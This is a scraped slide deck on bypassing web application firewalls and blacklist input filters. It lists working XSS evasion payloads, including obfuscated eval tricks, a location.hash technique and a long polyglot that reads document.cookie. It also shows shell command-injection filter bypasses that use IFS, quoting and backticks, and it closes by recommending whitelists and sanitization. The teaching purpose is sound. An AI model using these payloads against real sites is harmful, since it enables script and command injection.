Bypassing Web Application Firewalls and other security filters
1 like5,166 views
The document discusses various techniques to bypass web application filters and firewalls, detailing methods for exploiting XSS vulnerabilities and command input filters. It highlights the limitations of blacklist filters and emphasizes the importance of using whitelists and context-dependent sanitization to effectively prevent security issues. Additionally, it underscores the need for understanding programming languages and proper implementation of web safety measures.
![How likely is it to find bypasses?
Depends on the language and available functions
● Complex Languages
● JavaScript
■ Different property accessors (foo.bar, foo['bar']) -> window['al'+'ert'](1)
■ Many ways to evaluate code (eval, setTimeout, setInterval, Function(), script.src, …)
■ Lots of predefined functions for obfuscation (fromCharCode(), toString(), btoa(), …)
■ More on that later
● Error-Tolerant Languages
● HTML
■ Everybody should be able to write HTML code
■ Browsers fix malformed HTML (wrong encoding, missing quotes, x0d, x09, x0c x0a
x2f instead of spaces, …)
■ Lots of "inline event handlers" to avoid writing too much JS](https://image.slidesharecdn.com/bypassingwafsfilters-170907133941/85/Bypassing-Web-Application-Firewalls-and-other-security-filters-4-320.jpg)
● <x id = "x"><script>x.parentNode.parentNode.parentNode.location = '//google.com'</script>
● Code evaluation
● document.location = 'javascript:al'+'ert(1)'
● [].filter.constructor('al'+'ert(1)')() Function('al'+'ert(1)')()
● setTimeout('al'+'ert(1)') setInterval('al'+'ert(1)') eval('al'+'ert(1)')
● Move parts of the payload into the location.hash part
● vuln.php?xss=setTimeout(unescape(document.location))#%0aalert(1)
■ This looks pretty complicated. How does it work?](https://image.slidesharecdn.com/bypassingwafsfilters-170907133941/85/Bypassing-Web-Application-Firewalls-and-other-security-filters-8-320.jpg)
Bypassing Web Application Firewalls and other security filters
- 2. Every kid knows how to bypass filters "Since last thursday our printer prints this weird character combination over every single page. I don't know where you learned this but you are grounded!" ● Don't ● Turn on your TV ● Play on your Computer ● Watch movies on your smartphone ● Call your friends ● The kid ● Connects his game console to the PC screen ● Watches a TV show on the smart phone ● Sends message to friend to call him ----------------- TV IS STILL OFF ------------------------ KID PLAYS CONSOLE, NOT PC ------------------------------------- TV SHOWS ARE NOT MOVIES ------------------ HE DIDN'T CALL THEM, THEY CALLED HIM
- 3. Blacklist Filter Bypassing An easy concept ● Set of Rules ● Don't use these keywords ● Don't use that special char ● You are not allowed to use a keyword if it appears together with another keyword ● Everything is allowed as long as it's not breaking at least of the rules ● For blacklist filters to work you have to ● Think of every malicious keyword, character, or keyword combination ● Deobfuscate the input before checking it ● Keep it up to date
- 4. How likely is it to find bypasses? Depends on the language and available functions ● Complex Languages ● JavaScript ■ Different property accessors (foo.bar, foo['bar']) -> window['al'+'ert'](1) ■ Many ways to evaluate code (eval, setTimeout, setInterval, Function(), script.src, …) ■ Lots of predefined functions for obfuscation (fromCharCode(), toString(), btoa(), …) ■ More on that later ● Error-Tolerant Languages ● HTML ■ Everybody should be able to write HTML code ■ Browsers fix malformed HTML (wrong encoding, missing quotes, x0d, x09, x0c x0a x2f instead of spaces, …) ■ Lots of "inline event handlers" to avoid writing too much JS
- 5. Browser's XSS Filters Are they secure? Not 100% ● Can only protect against reflected XSS ● Check input for dangerous HTML / JavaScript ● If dangerous input is reflected to the page, block it ● Don't want to break poorly coded websites ● E.g. Chrome XSS Auditor behaviour on the website "https://same-origin.com/" ■ <script src = "https://other-origin.com/some.js"></script> X ■ <script src = "https://same-origin.com/some.js"></script> ✔ ● Allowing harmless HTML tags if there are no dangerous attributes ■ <div>Hi!</div> ✔ ■ <a href = "https://google.com/">Google</a> ✔ ■ <a href = "javascript:alert(1)">Click</a> X
- 6. The first rule of web app input filters DON'T WRITE YOUR OWN WEB APP INPUT FILTER
- 7. Practical XSS Filter Bypassing First step: Find a way to execute JavaScript ● Inline Event Handlers ● onload, onerror, onselect, onwheel, onscroll, … ● Almost every browser has their own ● Some even depend on the device (ontouchstart, ondevicelight, ...) ● Obfuscation ● <svg><script>a<!-->l</>er<?>t(1<!>)</script> ● <a href = " javasc	ript:alert%281%29">click</a> ● Uncommon tags ● <img src = "//google.com/favicon.ico" usemap="."><map name = "."><area shape = "default" href = "javascript:alert(1)"> (chrome) ● <math href = "javascript:alert(1)">click (FireFox)
- 8. Practical XSS Filter Bypassing Second Step: Bypass filters for javascript functions ● Unicode ● u0061lert(1) == alert(1) ● Property Accessors ● window['al'+'ert'](1) ● <x id = "x"><script>x.parentNode.parentNode.parentNode.location = '//google.com'</script> ● Code evaluation ● document.location = 'javascript:al'+'ert(1)' ● [].filter.constructor('al'+'ert(1)')() Function('al'+'ert(1)')() ● setTimeout('al'+'ert(1)') setInterval('al'+'ert(1)') eval('al'+'ert(1)') ● Move parts of the payload into the location.hash part ● vuln.php?xss=setTimeout(unescape(document.location))#%0aalert(1) ■ This looks pretty complicated. How does it work?
- 9. Practical XSS Filter Bypassing https://x.com/s?q=<svg/onload=eval(unescape(document.location))>#%0aalert(1) ● <svg/onload = *JS*> ● Executing the following string as javascript ● document.location is the URL, unescape decodes it, eval executes as JS ● https: is seen as label by javascript (same as goto) ● // is a javascript comment that ignores everything until the end of the line ● #%0aalert(1) this won't be sent to the browser, but is available to JavaScript via document.location. Unescape decodes it to #*NEWLINE*alert(1) ● The executed JS code https: //comment alert(1)
- 10. Bypassing an OS command input filter Common filters ● No spaces ● {uname,-a} ● IFS=,;`cat<<<uname,-a` ● uname${IFS}-a ● uname*tab here*-a ● Forbidden Keywords ● una""me -a ● una$()me -a ● un$'x61'me ● No | & ; ● ping xy`sleep 2` ● ping xy$(sleep 2)
- 11. DEMO TIME
- 12. The problem is obvious It's hard to think of all the possibilities ● Solution? Whitelists. You can't bypass those. ● E.g. Only allow URLs that start with "http://companyname.com" to avoid open redirects ■ http://companyname.com.attacker.com/ X AS WELL ● So no whitelists, right? ● Wrong ● Whitelists are still better than blacklists ● Easier to maintain ● Less to research and to keep in mind ● More effective Whitelists - like every other part of your web application - should be implemented properly. More often than not this is an order of magnitude easier than using a blacklist.
- 13. How to correctly prevent vulnerabilities? Don't solely rely on filters ● Whenever possible ● Use context dependent sanitization ● Try to get familiar with the programming language you use and possible pitfalls ■ PHP: difference between escapeshellarg / escapeshellcmd ■ Ruby: difference between ^ & and A z ● Get familiar with the language you are trying to sanitize ● Reasons to use a web application firewall ● As additional security measure ● To temporarily protect your application if you can't fix immediately ● If you don't write it yourself ■ Use a professional solution
- 15. XSS filter "bypass" polyglot '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt (1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confi rm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor. jpg"> '">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext></|><plaintext/onmouseover=prompt (1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(document.cookie)</script>"><img/id="confi rm(1)"/alt="/"src="/"onerror=eval(id)>'"><img src="http://www.shellypalmer.com/wp-content/images/2015/07/hacked-compressor. jpg"> ?? "To not get caught during a physical pentest you should dress as construction worker, employee, garbage man and security guard at the same time while you use an air horn and shout: look away!"